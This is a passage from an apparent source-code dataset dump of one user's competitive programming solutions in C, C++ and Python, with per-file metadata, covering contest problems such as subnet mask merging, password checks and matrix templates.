"src_encoding": "UTF-8", "text": "#include <cstdio>\n#include <vector>\n#include <iostream>\n \nusing namespace std;\n \nvoid run()\n{\n int x;\n cin >> x;\n if(!x){\n cout << 1;\n return;\n }\n if (x == 1){\n cout << 0;\n return;\n }\n if (x % 2){\n cout << 4;\n x--;\n }\n while (x >= 2){\n cout << 8;\n x -= 2;\n }\n}\n \nint main()\n{\n freopen(\"holes.in\", \"r\", stdin);\n freopen(\"holes.out\", \"w\", stdout);\n run();\n return 0;\n}" }, { "alpha_fraction": 0.3686770498752594, "alphanum_fraction": 0.4027237296104431, "avg_line_length": 24.700000762939453, "blob_id": "38e255ce9d866cebfdc83c022ce0cb520debec39", "content_id": "99327c6c7c1b2cd1c5e33043e8a0042226d7493d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1028, "license_type": "no_license", "max_line_length": 92, "num_lines": 40, "path": "/2022/quora/blocks.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "def get(n):\n n = int(n)\n ret = ['0'] * 8\n for i in range(8):\n if (1 << i) & n:\n ret[7 - i] = '1'\n return ''.join(ret)\n\nn = int(input())\nmasks = []\nfor i in range(n):\n s, m = input().split('/')\n m = int(m)\n c = ''.join(map(get, s.split('.')))\n c = c[:m] + '*' * (32 - m)\n masks.append(c)\n\nmasks.sort()\nans = [masks[0]]\nfor mask in masks:\n ans.append(mask)\n while len(ans) >= 2:\n first = -1\n for j in range(32):\n if ans[-2][j] != ans[-1][j]:\n first = j\n break\n if first == -1 or ans[-2][first] == '*':\n ans.pop()\n break\n if first == 31 or (ans[-2][first + 1] == '*' and ans[-1][first + 1] == '*'):\n ans[-2] = ans[-2][:first] + '*' * (32 - first)\n ans.pop()\n continue\n break\n\nfor mask in ans:\n m = 32 - mask.count('*')\n mask = mask.replace('*', '0')\n print('.'.join(str(int(mask[i * 8 : (i + 1) * 8], 2)) for i in range(4)) + '/' + str(m))\n" }, { "alpha_fraction": 0.29629629850387573, "alphanum_fraction": 0.3497942388057709, "avg_line_length": 21.090909957885742, "blob_id": "a46947326f44b76cd4fc2b361acefa65b51ba123", "content_id": "b07746e5c6566106e3afca658877a3599fce39bc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 486, "license_type": "no_license", "max_line_length": 63, "num_lines": 22, "path": "/CodeForce/0411/allLanguages/c.c", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include<stdio.h>\n#include<string.h>\n\nint main()\n{\n int i, ok = 0, ok1 = 0, ok2 = 0, ok3 = 0;\n char s[101];\n scanf(\"%s\", s);\n for (i = 0; i < strlen(s); i++)\n {\n if (s[i] >= 'a' && s[i] <= 'z')\n ok = 1;\n if (s[i] >= 'A' && s[i] <= 'Z')\n ok1 = 1;\n if (s[i] >= '0' && s[i] <= '9')\n ok2 = 1;\n }\n if (strlen(s) >= 5)\n ok3 = 1;;\n printf(ok + ok1 + ok2 + ok3 == 4 ? \"Correct\" : \"Too weak\");\n return 0;\n}\n" }, { "alpha_fraction": 0.4932655692100525, "alphanum_fraction": 0.5120711326599121, "avg_line_length": 30.23015785217285, "blob_id": "203c7fbc6643f4748b7f806e22670ac1671c5874", "content_id": "f333f01d638f560bacfa91bdb19ec6bf2dbc4714", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3935, "license_type": "no_license", "max_line_length": 174, "num_lines": 126, "path": "/2021/gcj1A/C.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) int a; readln(a)\n\n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\n#define ttt12i template<class T1, class T2> inline\n#define ttti template<class T> inline\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\ntemplate<class... Args> inline void readln(Args&... args){(read(args),...);}\ntemplate<class H, class...T> inline void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\n\n//Igorjan\n//}}}\n\nvoid run()\n{\n ints(n, q);\n auto stringify = [&](ll i) {\n string s;\n forj(q)\n s += ((1ll << j) & i) != 0 ? 'T' : 'F';\n return s;\n };\n auto maskify = [&](const string& s) {\n ll mask = 0;\n forj(q)\n if (s[j] == 'T')\n mask ^= 1ll << j;\n return mask;\n };\n\n auto invert = [&](const int& mask) {\n return mask ^ ((1ll << q) - 1);\n };\n\n auto getResult = [&](const int& answers, const int& mask) {\n return __builtin_popcount(invert(answers ^ mask));\n };\n\n vector<pair<ll, int>> s;\n fori(n)\n {\n string ss;\n int x;\n readln(ss, x);\n s.pb({maskify(ss), x});\n }\n for (auto& [answers, correct] : s)\n if (correct < q - correct)\n {\n correct = q - correct;\n answers = invert(answers);\n }\n if (n == 1)\n {\n cout << stringify(s[0].first) << \" \" << s[0].second << \"/1\" << endl;\n }\n else\n {\n vector<int> masks;\n fori(1 << q)\n {\n int ok = 0;\n for (const auto& [answers, correct]: s)\n ok += correct == getResult(answers, i);\n if (ok == 2)\n masks.pb(i);\n }\n\n int ms = 0;\n int answer = 0;\n fori(1 << q)\n {\n int cur = 0;\n for (int mask: masks)\n cur += getResult(i, mask);\n if (cur > ms)\n ms = cur,\n answer = i;\n }\n int g = gcd(ms, SZ(masks));\n cout << stringify(answer) << \" \" << ms / g << \"/\" << SZ(masks) / g << endl;\n }\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false);\n ints(t); fori(t) cout << \"Case #\" << (i + 1) << \": \", run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.47116968035697937, "alphanum_fraction": 0.48929160833358765, "avg_line_length": 15.405405044555664, "blob_id": "333684239a547b875f6c9f623479e44f2cb4c6b3", "content_id": "cc7c936a4f9587882b0f8f44f67f29d08dfe7de1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 607, "license_type": "no_license", "max_line_length": 51, "num_lines": 37, "path": "/trains/neerc/neerc.ifmo.ru.train.2013.10.08/D.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdlib>\n#include <iostream>\n#include <stack>\n#include <vector>\n#include <stdio.h>\n#include <queue>\n#include <set>\n#define INF 1000000007\n\nusing namespace std;\n\nstruct point\n{\n int x, y;\n point(){}\n};\n\nvoid run()\n{\n point s, t, q;\n scanf(\"%d %d %d %d\\n\", &s.x, &s.y, &t.x, &t.y);\n if (s.x > t.x)\n swap(s, t); else\n if (s.x == t.x)\n if (s.y > t.y)\n swap(s, t);\n // printf(\"%d %d %d %d\\n\", s.x, s.y, t.x, t.y);\n\n}\n\nint main()\n{\n // freopen(\"matching.in\", \"r\", stdin);\n// freopen(\"matching.out\", \"w+\", stdout);\n run();\n return 0;\n}\n" }, { "alpha_fraction": 0.4817466139793396, "alphanum_fraction": 0.4906943440437317, "avg_line_length": 46.35593032836914, "blob_id": "2de82a96ed5375c513782449a6901325691221da", "content_id": "86fdae7358de1a90ce28898855869489572e074a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2794, "license_type": "no_license", "max_line_length": 928, "num_lines": 59, "path": "/TopCoder/TC607/A.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdlib>\n#include <iostream>\n#include <stdio.h>\n#include <vector>\n#include <set>\n#include <algorithm>\n#include <queue>\n#define enter printf(\"\\n\");\n#define pb push_back\n#define ll long long\n#define fors(it, r) for (set<int>::iterator it = r.begin(); it != r.end(); it++)\n#define forvit(it, r) for (vector<int>::iterator it = r.begin(); it != r.end(); it++)\n#define forv(i, vector) for (int i = 0; i < vector.size(); i++)\n#define forn(i, n) for (int i = 0; i < n; i++)\n#define fori(n) for (int i = 0; i < n; i++)\n#define forj(n) for (int j = 0; j < n; j++)\n#define vi vector<int>\n#define rnv(a) read(n); vi a; readln(a, n);\n\n#define CLASSNAME PalindromicSubstringsDiv2\n#define METHODNAME count\n#define PARAMETRES vector <string> a, vector <string> b\n#define TYPE int\n\nusing namespace std;\nint INF = 1000000007;\nstring FILENAME = \"input\";\nstring FILEINPUT = FILENAME;\n\nvoid writeln(int a){printf(\"%d\\n\", a);}void writeln(int a, int b){printf(\"%d %d\\n\", a, b);}void writeln(int a, int b, int c){printf(\"%d %d %d\\n\", a, b, c);}void writeln(int a, int b, int c, int d){printf(\"%d %d %d %d\\n\", a, b, c, d);}void write(int a){printf(\"%d\", a);}void write(int a, int b){printf(\"%d %d\", a, b);}void write(int a, int b, int c){printf(\"%d %d %d\", a, b, c);}void write(int a, int b, int c, int d){printf(\"%d %d %d %d\", a, b, c, d);}void read(int &a){scanf(\"%d\", &a);}void read(int &a, int &b){scanf(\"%d %d\", &a, &b);}void read(int &a, int &b, int &c){scanf(\"%d %d %d\", &a, &b, &c);}void read(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\", &a, &b, &c, &d);}void readln(int &a){scanf(\"%d\\n\", &a);}void readln(int &a, int &b){scanf(\"%d %d\\n\", &a, &b);}void readln(int &a, int &b, int &c){scanf(\"%d %d %d\\n\", &a, &b, &c);}void readln(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\\n\", &a, &b, &c, &d);}\nvoid readln(vector<int> &f, int n){int x;for (int i = 1; i <= n; i++){read(x);f.push_back(x);}}void writeln(vector<int> &f){for (int i = 0; i < f.size(); i++)printf(\"%d%c\", f[i], i == f.size() - 1 ? '\\n' : ' ');}\n\nclass CLASSNAME\n{\n public :\n int smallestArea(vector <int> x, vector <int> y)\n {\n string s = \"\";\n forn(i, a.size())\n s += a[i];\n forn(i, b.size())\n s += b[i];\n int ans = 0;\n int n = s.size();\n forn(i, n)\n for (int j = 0; i + j < n && i - j >= 0; j++)\n if (s[i + j] == s[i - j])\n ans++;\n else\n break;\n forn(i, n)\n for (int j = 0; i + j < n && i - j - 1 >= 0; j++)\n if (s[i + j] == s[i - j - 1])\n ans++;\n else\n break;\n return ans;\n }\n};\n" }, { "alpha_fraction": 0.42124277353286743, "alphanum_fraction": 0.43605491518974304, "avg_line_length": 29.086956024169922, "blob_id": "6c8822fa5ded77c3579bae6a1cdb956374ebdd59", "content_id": "bcb05b329b3a26051fb035297c6bf768a3596300", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2768, "license_type": "no_license", "max_line_length": 928, "num_lines": 92, "path": "/2013/2013RCC3/B.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdlib>\n#include <iostream>\n#include <stdio.h>\n#include <vector>\n#include <set>\n#include <algorithm>\n#define enter printf(\"\\n\");\n#define vi vector<int>\n\nusing namespace std;\nint INF = 1000000007;\nvector<int> a, b, c, d;\nint n, m;\nvoid writeln(int a){printf(\"%d\\n\", a);}void writeln(int a, int b){printf(\"%d %d\\n\", a, b);}void writeln(int a, int b, int c){printf(\"%d %d %d\\n\", a, b, c);}void writeln(int a, int b, int c, int d){printf(\"%d %d %d %d\\n\", a, b, c, d);}void write(int a){printf(\"%d\", a);}void write(int a, int b){printf(\"%d %d\", a, b);}void write(int a, int b, int c){printf(\"%d %d %d\", a, b, c);}void write(int a, int b, int c, int d){printf(\"%d %d %d %d\", a, b, c, d);}void read(int &a){scanf(\"%d\", &a);}void read(int &a, int &b){scanf(\"%d %d\", &a, &b);}void read(int &a, int &b, int &c){scanf(\"%d %d %d\", &a, &b, &c);}void read(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\", &a, &b, &c, &d);}void readln(int &a){scanf(\"%d\\n\", &a);}void readln(int &a, int &b){scanf(\"%d %d\\n\", &a, &b);}void readln(int &a, int &b, int &c){scanf(\"%d %d %d\\n\", &a, &b, &c);}void readln(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\\n\", &a, &b, &c, &d);}\n\nvoid readln(vector<int> &f, int n)\n{\n int x;\n for (int i = 1; i <= n; i++)\n {\n read(x);\n f.push_back(x);\n }\n}\n\nvoid writeln(vector<int> &f)\n{\n for (int i = 0; i < f.size(); i++)\n printf(\"%d%c\", f[i], i == f.size() - 1 ? '\\n' : ' ');\n}\n\nint counter = 0;\nbool tr(vector<int> a, vi b, vi c, vi d, int t, int s)\n{\n /*writeln(d);\n writeln(a);\n writeln(b);\n writeln(c);\n enter;*/\n if (s > n)\n return false;\n bool f = false;\n for (int i = t; i <= 3 * n; i++)\n {\n if (d[i])\n continue;\n b[s] = i;\n c[s] = a[s] + b[s];\n if (c[s] <= 3 * n && d[c[s]])\n continue;\n if (c[s] > 3 * n)\n return false;\n d[b[s]]++;\n d[c[s]]++;\n if (s == n && a[s] + b[s] == c[s] && c[s] <= 3 * n && d[c[s]] == 1)\n {\n writeln(a);\n writeln(b);\n writeln(c);\n return true;\n }\n f |= tr(a, b, c, d, t, s + 1);\n if (f)\n return true;\n d[b[s]] = max(0, d[b[s]] - 1);\n d[c[s]] = max(0, d[c[s]] - 1);\n }\n return f;\n}\n\nint main()\n{\n freopen(\"input.txt\", \"r\", stdin);\n// freopen(\"output.txt\", \"w+\", stdout);\n readln(n);\n n = 20;\n for (n = 1; n <= 23; n++)\n {\n writeln(n);\n if (n % 4 >= 2)\n continue;\n d.resize(3 * n + 1, 0);\n a.resize(n + 1);\n for (int i = 1; i <= n; i++)\n a[i] = i,\n d[i] = 1;\n b.resize(n + 1);\n c.resize(n + 1);\n tr(a, b, c, d, n, 1);\n }\n return 0;\n}\n" }, { "alpha_fraction": 0.3249778747558594, "alphanum_fraction": 0.34856975078582764, "avg_line_length": 24.885496139526367, "blob_id": "3dba6779cdf6ae4efd40c968c4c66b1c7e717de8", "content_id": "179bd97438d491f5987ce3723d6fede7bff758ff", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3391, "license_type": "no_license", "max_line_length": 88, "num_lines": 131, "path": "/2014/gcj2014_0/C.hpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#ifndef SOLUTION_HPP\n#define SOLUTION_HPP\n\n#include <bits/stdc++.h>\n#include <QObject>\n#include <QRunnable>\n#include <QThread>\n#include <QTextStream>\n#include <QDebug>\n#define enter printf(\"\\n\")\n#define pb push_back\n#define ll long long\n#define fors(it, r) for (set<int>::iterator it = r.begin(); it != r.end(); it++)\n#define forvit(it, r) for (vector<int>::iterator it = r.begin(); it != r.end(); it++)\n#define forv(i, vector) for (int i = 0; i < vector.size(); i++)\n#define forn(i, n) for (int i = 0; i < n; i++)\n#define forn1(i, n) for (int i = 1; i < n; i++)\n#define fori(n) for (int i = 0; i < n; i++)\n#define forj(n) for (int j = 0; j < n; j++)\n#define vi vector<int>\n#define vll vector<long long>\n#define pii pair<int, int>\n\nusing namespace std;\n\nstruct Solution\n{\n int n, m, count;\n vector<vector<int>> a;\n int ans = 0;\n int dfscount = 0;\n\n void input(QTextStream &in)\n {\n in >> n >> m >> count;\n a.resize(n + 2);\n fori(n + 1)\n a[i].resize(m + 2);\n }\n\n void dfs(int i, int j, vector<vector<int>> aa, int cur = 1)\n {\n if (i == 0 || j == 0 || i == n + 1 || j == m + 1)\n return;\n aa[i][j] = 1;\n if (cur == count)\n throw aa;\n dfscount++;\n int temp = 0;\n for (int dx = -1; dx <= 1; dx++)\n for (int dy = -1; dy <= 1; dy++)\n if (!(i + dx == 0 || j + dy == 0 || i + dx == n + 1 || j + dy == m + 1))\n if (aa[i + dx][j + dy] == 0)\n aa[i + dx][j + dy] = 1,\n temp++;\n if (cur + temp > count || temp == 0)\n return;\n else\n for (int dx = -1; dx <= 1; dx++)\n for (int dy = -1; dy <= 1; dy++)\n if (dx * dx + dy * dy)\n dfs(i + dx, j + dy, aa, cur + temp);\n }\n\n void solve()\n {\n if (n == 1)\n {\n ans = 1;\n a[1][1] = 2;\n forn1(j, m - count)\n a[1][j + 1] = 1;\n return;\n }\n if (m == 1)\n {\n ans = 1;\n a[1][1] = 2;\n forn1(j, n - count)\n a[j + 1][1] = 1;\n return;\n }\n if (n == 2 || m == 2)\n if (count % 2 && count != n * m - 1)\n {\n ans = 0;\n return;\n }\n if (count == 0)\n {\n ans = 1;\n fori(n + 1)\n forj(m + 1)\n a[i][j] = 1;\n a[1][1] = 2;\n return;\n }\n count = n * m - count;\n forn1(i, n + 1)\n forn1(j, m + 1)\n try\n {\n dfs(i, j, a);\n }\n catch(vector<vector<int>> e)\n {\n ans = 1;\n e[i][j] = 2;\n fori(n+1)\n forj(m+1)\n a[i][j] = e[i][j];\n return;\n }\n ans = 0;\n }\n\n void output(QTextStream &out)\n {\n if (ans == 0)\n out << \"Impossible\\n\";\n else\n forn1(i, n + 1)\n {\n forn1(j, m + 1)\n out << (a[i][j] == 0 ? '*' : a[i][j] == 1 ? '.' : 'c');\n out << \"\\n\";\n }\n }\n};\n\n#endif // SOLUTION_HPP\n" }, { "alpha_fraction": 0.3142857253551483, "alphanum_fraction": 0.3928571343421936, "avg_line_length": 22.33333396911621, "blob_id": "de59bf5e590d0104421ba5b88ee808de08a7281d", "content_id": "f316cb5484a0c14c07078979d766ce5dbfb5e29f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 140, "license_type": "no_license", "max_line_length": 49, "num_lines": 6, "path": "/2015/tpp/B.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "s = input()\nt = \"1\" * 4\nif len(s) == 80 and (s[:4] == t) ^ (s[-4:] == t):\n print(s if s[:4] == t else s[::-1])\nelse:\n print(\"0\" * 80)\n" }, { "alpha_fraction": 0.4919678568840027, "alphanum_fraction": 0.5097891688346863, "avg_line_length": 29.18181800842285, "blob_id": "f782bfae28b4a19a8fb105ddcfc9ef027ae3936d", "content_id": "2d40f3a78dfe5166cb466e38739f18084f3ec415", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3984, "license_type": "no_license", "max_line_length": 174, "num_lines": 132, "path": "/CodeForce/1732/C2.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <bits/stdc++.h>\n#ifdef ONLINE_JUDGE\n#pragma GCC target(\"avx2,bmi,bmi2,lzcnt,popcnt\")\n#endif\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) int a; readln(a)\n\n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\n#define ttt12i template<class T1, class T2> inline\n#define ttti template<class T> inline\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\ntemplate<class... Args> inline void readln(Args&... args){(read(args),...);}\ntemplate<class H, class...T> inline void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\n\n//Igorjan\n//binSearch\n//x \\in [l, r]-> min, f(x) == true\ntemplate<typename T, typename F>\nT binSearch(T l, T r, F f, T eps = 1)\n{\n T m;\n while (abs(r - l) > eps)\n m = l + (r - l) / 2,\n (f(m) ? r : l) = m;\n return f(l) ? l : r;\n}\n\n//}}}\n\npair<ll, ll> add(const pair<ll, ll>& a, const pair<ll, ll>& b)\n{\n return {a.first + b.first, a.second ^ b.second};\n}\n\nvoid run()\n{\n ints(n, q);\n vi a(n);\n readln(a);\n vector<ll> p = {0};\n vector<ll> x = {0};\n set<int> s, b;\n fori(n)\n {\n p.pb(p.back() + a[i]);\n x.pb(x.back() ^ a[i]);\n if (a[i])\n s.insert(i + 1),\n b.insert(-i - 1);\n }\n\n auto get = [&](int l, int r) {\n --l;\n return p[r] - p[l] - (x[r] ^ x[l]);\n };\n forn(Q, q)\n {\n ints(l, r);\n ll sum = get(l, r);\n if (sum == 0)\n {\n writeln(l, l);\n continue;\n }\n int index = l;\n int length = r - l;\n auto first = s.lower_bound(l);\n int cnt = 0;\n while (first != s.end() && *first <= r && cnt <= 31)\n {\n int ll = *first;\n auto second = b.lower_bound(-r);\n for (int i = cnt; i <= 31; ++i)\n {\n if (second == b.end() || -*second < ll)\n break;\n int rr = -*second;\n if (get(ll, rr) == sum)\n if (rr - ll < length)\n length = rr - ll,\n index = ll;\n ++second;\n }\n ++cnt;\n ++first;\n\n }\n writeln(index, index + length);\n }\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false); cin.tie(0);\n ints(t); fori(t) run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.5053732395172119, "alphanum_fraction": 0.520952045917511, "avg_line_length": 31.394859313964844, "blob_id": "5b3fb2afe740331a2ae7b97443b55d8ec033741b", "content_id": "71d9896bc6a1b5225807264e2d3ebdab30a88617", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 13865, "license_type": "no_license", "max_line_length": 162, "num_lines": 428, "path": "/CodeForce/1182/E.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 07 August 2018 (&&, whole) {{{\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define FILENAME \"input\"\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef valarray<int> va;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define whole(a) begin(a), end(a)\n#define next next__\n#define prev prev__\n#define count count__\n\n#define ints(a...) int a; readln(a)\n#define wr(args...) err(#args, args)\n\n#define ttt12i template<class T1, class T2> inline\n#define tthti template<class H, class...T> inline\n#define ttta template<class... Args> inline\n#define ttti template<class T> inline\n\nconst int MOD = 1000000007;\nconst int INTMAX = numeric_limits<int>::max();\nconst ll LLMAX = numeric_limits<ll>::max();\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\nttta void readln(Args&... args){(read(args),...);}tthti void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\nttti void writeln_range(T f,T s){if(f!=s)for(auto i=f;i!=s;++i)writeln(*i);}\nvector<string>split(string&s,string d){vector<string>v;size_t p=0;while((p=s.find(d))!=string::npos)v.pb(s.substr(0,p)),s.erase(0,p+d.length());v.pb(s);return v;}\nttta void err(string v,Args...args){auto vv=split(v,\", \");auto it=vv.begin();(writeln(*it++,\"=\",args),...);}\n\n\n//matrix\ntemplate<typename T>\nstruct matrix\n{\n friend void swap(matrix& lhs, matrix& rhs)\n {\n swap(lhs.n, rhs.n);\n swap(lhs.m, rhs.m);\n swap(lhs.a, rhs.a);\n }\n\n matrix(int n, int m) : n(n), m(m)\n {\n a.resize(n, valarray(T(), m));\n fori(::min(n, m)) a[i][i] = T(1);\n }\n\n matrix(int n, int m, const T& initial) : n(n), m(m)\n {\n a.resize(n, valarray(initial, m));\n }\n\n matrix(const valarray<valarray<T>>& rhs)\n {\n n = size(rhs);\n m = n == 0 ? 0 : size(rhs[0]);\n a.resize(n, valarray(T(), m));\n fori(n) forj(m) a[i][j] = rhs[i][j];\n }\n \n matrix(const vector<T>& rhs)\n {\n n = size(rhs);\n m = 1;\n a.resize(n, valarray<T>(0, 1));\n fori(n) a[i] = rhs[i];\n }\n\n matrix(const valarray<T>& rhs)\n {\n n = size(rhs);\n m = 1;\n a.resize(n, valarray<T>(0, 1));\n fori(n) a[i] = rhs[i];\n }\n\n matrix(const matrix<T>& rhs) : n(rhs.n), m(rhs.m), a(rhs.a) {}\n\n matrix& operator=(const matrix& rhs)\n {\n if (&rhs == this)\n return *this;\n matrix temp(rhs);\n swap(*this, temp);\n return *this;\n }\n\n matrix& operator=(const T& rhs)\n {\n matrix temp(n, m, rhs);\n swap(*this, temp);\n return *this;\n }\n\n matrix& operator=(const valarray<T>& rhs)\n {\n matrix temp(size(rhs), 1, 0);\n fori(temp.n) a[i][0] = rhs[i];\n swap(*this, temp);\n return *this;\n }\n\n valarray<T>& operator[](int i) { return a[i]; }\n const valarray<T>& operator[](int i) const { return a[i]; }\n\n matrix& operator+=(const matrix& rhs) { a += rhs.a; return *this; }\n matrix& operator-=(const matrix& rhs) { a -= rhs.a; return *this; }\n matrix& operator+=(const T& rhs) { fori(n) a[i] += rhs; return *this; }\n matrix& operator-=(const T& rhs) { fori(n) a[i] -= rhs; return *this; }\n matrix& operator*=(const T& rhs) { fori(n) a[i] *= rhs; return *this; }\n matrix& operator/=(const T& rhs) { fori(n) a[i] /= rhs; return *this; }\n matrix& operator%=(const T& rhs) { fori(n) a[i] %= rhs; return *this; }\n matrix& operator*=(const matrix& rhs) {\n assert(m == rhs.n);\n matrix temp(n, rhs.m, 0);\n fori(n) forj(m) forn(k, rhs.m) temp.a[i][k] += a[i][j] * rhs[j][k];\n return *this = temp;\n }\n\n matrix& operator|=(const matrix& rhs) {\n assert(n == rhs.n);\n matrix temp(n, m + rhs.m, 0);\n fori(n) forj(m) temp[i][j] = a[i][j];\n fori(n) forj(rhs.m) temp[i][j + m] = rhs[i][j];\n return *this = temp;\n }\n\n matrix& operator^=(ll i) {\n assert(i >= 0);\n if (i == 0) return *this = matrix(n, m);\n return *this = binpow(*this, std::abs(i));\n }\n template<typename T1>\n valarray<T> operator*(const valarray<T1>& rhs) {\n assert(m == size(rhs));\n valarray<T1> ans(n);\n fori(n) forn(k, m) ans[i] += a[i][k] * rhs[k];\n return ans;\n }\n template<typename T1>\n friend valarray<T1> operator*(const valarray<T1>& lhs, const matrix& rhs) {\n assert(size(lhs) == rhs.n);\n valarray<T1> ans = {{0, 0, 0, 0, 0}, {0, 0, 0, 0, 0}, {0, 0, 0, 0, 0}, {0, 0, 0, 0, 0}, {0, 0, 0, 0, 0}};\n forj(rhs.m) forn(k, rhs.n) ans[j] += lhs[k] * rhs[k][j];\n return ans;\n }\n matrix operator-() { return *this *= -1; }\n\n friend matrix operator+(matrix lhs, const matrix& rhs) { lhs += rhs; return lhs; }\n friend matrix operator-(matrix lhs, const matrix& rhs) { lhs += rhs; return lhs; }\n friend matrix operator*(matrix lhs, const matrix& rhs) { lhs *= rhs; return lhs; }\n friend matrix 